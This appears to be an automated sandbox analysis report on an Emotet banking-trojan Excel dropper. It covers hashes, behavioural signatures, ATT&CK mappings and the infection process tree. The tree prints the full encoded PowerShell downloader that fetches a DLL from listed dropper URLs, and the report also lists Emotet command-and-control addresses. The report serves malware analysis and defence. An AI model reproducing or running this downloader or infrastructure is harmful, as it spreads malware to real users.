emotet | b270f1dc0e9a1979ad04d277031b351fd46e4edcc244404db32226259f89ccb2

General

Target

8137ec71fc0aeab0be48d885d1334de3.xls
Size

121KB
MD5

8137ec71fc0aeab0be48d885d1334de3
SHA1

e88e7cb7c1d78aecf48b226d1c8e4c1089ed7204
SHA256

b270f1dc0e9a1979ad04d277031b351fd46e4edcc244404db32226259f89ccb2
SHA512

bd9247f2c2cc45a9f9eedbc8ba499f615d19ee30c0f76748e12135426522251b089fb4b7758fad45c5880e9cd87c67a8b0bc221ec41db59862735cdfb8c80e5f
SSDEEP

3072:ucKoSsxzNDZLDZjlbR868O8KlVH37kehvMqAPjxO5xyZUE5V5xtezEVg8/dgcBFl:ucKoSsxzNDZLDZjlbR868O8KlVH37keI

Score

10^/10

emotet epoch4 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://youlanda.org/eln-images/n8DPZISf/

exe.dropper

http://rosevideo.net/eln-images/EjdCoMlY8Gy/

exe.dropper

http://vbaint.com/eln-images/H2pPGte8XzENC/

exe.dropper

https://framemakers.us/eln-images/U5W2IGE9m8i9h9r/

exe.dropper

http://niplaw.com/asolidfoundation/yCE9/

exe.dropper

http://robertmchilespe.com/cgi/3f/

exe.dropper

http://vocoptions.net/cgi/ifM9R5ylbVpM8hfR/

exe.dropper

http://missionnyc.org/fonts/JO5/

exe.dropper

http://robertflood.us/eln-images/DGI2YOkSc99XPO/

exe.dropper

http://mpmcomputing.com/fonts/fJJrjqpIY3Bt3Q/

exe.dropper

http://dadsgetinthegame.com/eln-images/tAAUG/

exe.dropper

http://smbservices.net/cgi/JO01ckuwd/

exe.dropper

http://stkpointers.com/eln-images/D/

exe.dropper

http://rosewoodcraft.com/Merchant2/5.00/PGqX/

Extracted

Family

emotet

Botnet

Epoch4

C2

185.248.140.40:443

8.9.11.48:443

200.17.134.35:7080

207.38.84.195:8080

79.172.212.216:8080

45.176.232.124:443

45.118.135.203:7080

162.243.175.63:443

110.232.117.186:8080

103.75.201.4:443

195.154.133.20:443

160.16.102.168:80

164.68.99.3:8080

131.100.24.231:80

216.158.226.206:443

159.89.230.105:443

178.79.147.66:8080

178.128.83.165:80

212.237.5.209:443

82.165.152.127:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

wscript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	388	4972	wscript.exe	EXCEL.EXE

Blocklisted process makes network request 13 IoCs

Processes:

powershell.exerundll32.exe

flow	pid	process
38	5088	powershell.exe
58	5088	powershell.exe
60	5088	powershell.exe
62	5088	powershell.exe
64	5088	powershell.exe
66	5088	powershell.exe
70	1908	rundll32.exe
78	1908	rundll32.exe
82	1908	rundll32.exe
85	1908	rundll32.exe
86	1908	rundll32.exe
87	1908	rundll32.exe
88	1908	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 4 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

pid process

5032 rundll32.exe
4752 rundll32.exe
764 rundll32.exe
1908 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
5032	rundll32.exe
4752	rundll32.exe
764	rundll32.exe
1908	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef	rundll32.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4972 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exerundll32.exe

pid process

5088 powershell.exe
5088 powershell.exe
1908 rundll32.exe
1908 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 5088 powershell.exe

pid	process
5088	powershell.exe
5088	powershell.exe
1908	rundll32.exe
1908	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	5088	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE
4972	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXEwscript.execmd.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 4972 wrote to memory of 388	4972	EXCEL.EXE	wscript.exe
PID 4972 wrote to memory of 388	4972	EXCEL.EXE	wscript.exe
PID 388 wrote to memory of 2044	388	wscript.exe	cmd.exe
PID 388 wrote to memory of 2044	388	wscript.exe	cmd.exe
PID 2044 wrote to memory of 5088	2044	cmd.exe	powershell.exe
PID 2044 wrote to memory of 5088	2044	cmd.exe	powershell.exe
PID 388 wrote to memory of 1020	388	wscript.exe	cmd.exe
PID 388 wrote to memory of 1020	388	wscript.exe	cmd.exe
PID 1020 wrote to memory of 5032	1020	cmd.exe	rundll32.exe
PID 1020 wrote to memory of 5032	1020	cmd.exe	rundll32.exe
PID 1020 wrote to memory of 5032	1020	cmd.exe	rundll32.exe
PID 5032 wrote to memory of 4752	5032	rundll32.exe	rundll32.exe
PID 5032 wrote to memory of 4752	5032	rundll32.exe	rundll32.exe
PID 5032 wrote to memory of 4752	5032	rundll32.exe	rundll32.exe
PID 4752 wrote to memory of 764	4752	rundll32.exe	rundll32.exe
PID 4752 wrote to memory of 764	4752	rundll32.exe	rundll32.exe
PID 4752 wrote to memory of 764	4752	rundll32.exe	rundll32.exe
PID 764 wrote to memory of 1908	764	rundll32.exe	rundll32.exe
PID 764 wrote to memory of 1908	764	rundll32.exe	rundll32.exe
PID 764 wrote to memory of 1908	764	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\8137ec71fc0aeab0be48d885d1334de3.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4972

C:\Windows\SYSTEM32\wscript.exe
wscript c:\programdata\tjspowj.vbs
2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\uidpjewl.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enc JABNAEoAWABkAGYAcwBoAEQAcgBmAEcAWgBzAGUAcwA0AD0AIgBoAHQAdABwAHMAOgAvAC8AeQBvAHUAbABhAG4AZABhAC4AbwByAGcALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8AbgA4AEQAUABaAEkAUwBmAC8ALABoAHQAdABwADoALwAvAHIAbwBzAGUAdgBpAGQAZQBvAC4AbgBlAHQALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARQBqAGQAQwBvAE0AbABZADgARwB5AC8ALABoAHQAdABwADoALwAvAHYAYgBhAGkAbgB0AC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ASAAyAHAAUABHAHQAZQA4AFgAegBFAE4AQwAvACwAaAB0AHQAcABzADoALwAvAGYAcgBhAG0AZQBtAGEAawBlAHIAcwAuAHUAcwAvAGUAbABuAC0AaQBtAGEAZwBlAHMALwBVADUAVwAyAEkARwBFADkAbQA4AGkAOQBoADkAcgAvACwAaAB0AHQAcAA6AC8ALwBuAGkAcABsAGEAdwAuAGMAbwBtAC8AYQBzAG8AbABpAGQAZgBvAHUAbgBkAGEAdABpAG8AbgAvAHkAQwBFADkALwAsAGgAdAB0AHAAOgAvAC8AcgBvAGIAZQByAHQAbQBjAGgAaQBsAGUAcwBwAGUALgBjAG8AbQAvAGMAZwBpAC8AMwBmAC8ALABoAHQAdABwADoALwAvAHYAbwBjAG8AcAB0AGkAbwBuAHMALgBuAGUAdAAvAGMAZwBpAC8AaQBmAE0AOQBSADUAeQBsAGIAVgBwAE0AOABoAGYAUgAvACwAaAB0AHQAcAA6AC8ALwBtAGkAcwBzAGkAbwBuAG4AeQBjAC4AbwByAGcALwBmAG8AbgB0AHMALwBKAE8ANQAvACwAaAB0AHQAcAA6AC8ALwByAG8AYgBlAHIAdABmAGwAbwBvAGQALgB1AHMALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARABHAEkAMgBZAE8AawBTAGMAOQA5AFgAUABPAC8ALABoAHQAdABwADoALwAvAG0AcABtAGMAbwBtAHAAdQB0AGkAbgBnAC4AYwBvAG0ALwBmAG8AbgB0AHMALwBmAEoASgByAGoAcQBwAEkAWQAzAEIAdAAzAFEALwAsAGgAdAB0AHAAOgAvAC8AZABhAGQAcwBnAGUAdABpAG4AdABoAGUAZwBhAG0AZQAuAGMAbwBtAC8AZQBsAG4ALQBpAG0AYQBnAGUAcwAvAHQAQQBBAFUARwAvACwAaAB0AHQAcAA6AC8ALwBzAG0AYgBzAGUAcgB2AGkAYwBlAHMALgBuAGUAdAAvAGMAZwBpAC8ASgBPADAAMQBjAGsAdQB3AGQALwAsAGgAdAB0AHAAOgAvAC8AcwB0AGsAcABvAGkAbgB0AGUAcgBzAC4AYwBvAG0ALwBlAGwAbgAtAGkAbQBhAGcAZQBzAC8ARAAvACwAaAB0AHQAcAA6AC8ALwByAG8AcwBlAHcAbwBvAGQAYwByAGEAZgB0AC4AYwBvAG0ALwBNAGUAcgBjAGgAYQBuAHQAMgAvADUALgAwADAALwBQAEcAcQBYAC8AIgAuAHMAUABMAEkAdAAoACIALAAiACkAOwAgAGYAbwBSAGUAQQBDAGgAKAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAGkATgAgACQATQBKAFgAZABmAHMAaABEAHIAZgBHAFoAcwBlAHMANAApAHsAIAAkAEcAdwBlAFkASAA1ADcAcwBlAGQAcwB3AGQAPQAoACIAYwBpAHUAdwBkADoAaQB1AHcAZABcAHAAcgBpAHUAdwBkAG8AZwBpAHUAdwBkAHIAYQBtAGkAdQB3AGQAZABhAHQAaQB1AHcAZABhAFwAcAB1AGkAaABvAHUAZAAuAGQAaQB1AHcAZABsAGkAdQB3AGQAbAAiACkALgByAGUAUABsAEEAQwBlACgAIgBpAHUAdwBkACIALAAiACIAKQA7AGkAbgBWAE8AawBlAC0AdwBlAEIAcgBFAHEAVQBlAHMAVAAgAC0AdQBSAEkAIAAkAHkASQBkAHMAUgBoAHkAZQAzADQAcwB5AHUAZgBnAHgAagBjAGQAZgAgAC0AbwBVAHQARgBJAGwAZQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAA7AGkARgAoAHQAZQBTAHQALQBwAEEAVABoACAAJABHAHcAZQBZAEgANQA3AHMAZQBkAHMAdwBkACkAewBpAGYAKAAoAGcARQB0AC0AaQB0AEUAbQAgACQARwB3AGUAWQBIADUANwBzAGUAZABzAHcAZAApAC4AbABlAE4ARwB0AGgAIAAtAGcAZQAgADQANwA0ADMANgApAHsAYgBSAGUAYQBrADsAfQB9AH0A
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

\??\c:\windows\syswow64\rundll32.exe
c:\windows\syswow64\rundll32.exe c:\programdata\puihoud.dll,tjpleowdsyf
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5032

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "c:\programdata\puihoud.dll",DllRegisterServer
5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",kXCEFoePMAvs
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef",DllRegisterServer
7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1908

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\puihoud.dll
Filesize
412KB

MD5
77eeb66f96fd8dd8e98c26f061ba7a8b

SHA1
8f3384b4015ccdf4f89baabd615e8660ecb51b82

SHA256
18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52

SHA512
315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

Download Submit
C:\ProgramData\puihoud.dll
Filesize
412KB

MD5
77eeb66f96fd8dd8e98c26f061ba7a8b

SHA1
8f3384b4015ccdf4f89baabd615e8660ecb51b82

SHA256
18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52

SHA512
315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

Download Submit
C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef
Filesize
412KB

MD5
77eeb66f96fd8dd8e98c26f061ba7a8b

SHA1
8f3384b4015ccdf4f89baabd615e8660ecb51b82

SHA256
18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52

SHA512
315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

Download Submit
C:\Windows\SysWOW64\Kidkmwuyqaydrqwt\ziwzsspywbsiz.gef
Filesize
412KB

MD5
77eeb66f96fd8dd8e98c26f061ba7a8b

SHA1
8f3384b4015ccdf4f89baabd615e8660ecb51b82

SHA256
18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52

SHA512
315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

Download Submit
C:\programdata\uidpjewl.bat
Filesize
3KB

MD5
6af598c95c689c2be476d63c499354db

SHA1
6affcd3ef00724c2ce144950d79a6195ce72c06e

SHA256
7a899fe4ad1682d78e178b77e3e1eb7c5a5d30c84482e8f5c8d2ae078e983029

SHA512
3c2d0dc7cc0281cf9553bc3442b7a47b3cd7ab723b201441056c1a87094b8f11aa79a0728b0d60e3279fab97d809cf237802e839a3079f6ca67df468e06e9b70

Download Submit
\??\c:\programdata\puihoud.dll
Filesize
412KB

MD5
77eeb66f96fd8dd8e98c26f061ba7a8b

SHA1
8f3384b4015ccdf4f89baabd615e8660ecb51b82

SHA256
18e3b0d902f95fb74affd0f0e203b5a7d6d8a9aa17967611b17377008b5f0c52

SHA512
315be0f546c45214da53e238b4b6a9f4c930ef1be9f3a4ff71002afda091fe533275c2f4f8c403ffc1b8e73ec076c2465ad14c7e9df3707536d46089b9940ef6

Download Submit
\??\c:\programdata\tjspowj.vbs
Filesize
689B

MD5
24a3cd3164d4db5a47b7a321aa51b0c6

SHA1
eb7277f82001af340b6404300465629b19811c3a

SHA256
5eed2cdac8033b25525f9240c83f793f12e606451298bb314ab4b40af62f08a2

SHA512
3ed236cd1bfa2283eec0443dcabd602fc100a2b4c38b60aa9ab99d769dc61f115032686b5572db16e98b9ecb44a94053eb9f0a9b46e94a854217311d0076c8e2

Download Submit
memory/388-139-0x0000000000000000-mapping.dmp

Download
memory/764-162-0x0000000000000000-mapping.dmp

Download
memory/764-164-0x00000000012C0000-0x00000000012E8000-memory.dmp

Filesize
160KB

Download
memory/1020-150-0x0000000000000000-mapping.dmp

Download
memory/1908-169-0x0000000002AD0000-0x0000000002AF8000-memory.dmp

Filesize
160KB

Download
memory/1908-167-0x0000000000000000-mapping.dmp

Download
memory/2044-143-0x0000000000000000-mapping.dmp

Download
memory/4752-159-0x0000000000F30000-0x0000000000F58000-memory.dmp

Filesize
160KB

Download
memory/4752-157-0x0000000000000000-mapping.dmp

Download
memory/4972-141-0x000001F735440000-0x000001F735444000-memory.dmp

Filesize
16KB

Download
memory/4972-133-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-173-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-137-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmp

Filesize
64KB

Download
memory/4972-174-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-136-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-175-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-176-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-135-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-132-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/4972-138-0x00007FF97AC00000-0x00007FF97AC10000-memory.dmp

Filesize
64KB

Download
memory/4972-134-0x00007FF97CD10000-0x00007FF97CD20000-memory.dmp

Filesize
64KB

Download
memory/5032-151-0x0000000000000000-mapping.dmp

Download
memory/5032-154-0x0000000002720000-0x0000000002748000-memory.dmp

Filesize
160KB

Download
memory/5088-149-0x00007FF993610000-0x00007FF9940D1000-memory.dmp

Filesize
10.8MB

Download
memory/5088-148-0x0000021DEEDD0000-0x0000021DEF576000-memory.dmp

Filesize
7.6MB

Download
memory/5088-147-0x00007FF993610000-0x00007FF9940D1000-memory.dmp

Filesize
10.8MB

Download
memory/5088-146-0x00007FF993610000-0x00007FF9940D1000-memory.dmp

Filesize
10.8MB

Download
memory/5088-145-0x0000021DEDFD0000-0x0000021DEDFF2000-memory.dmp

Filesize
136KB

Download
memory/5088-144-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads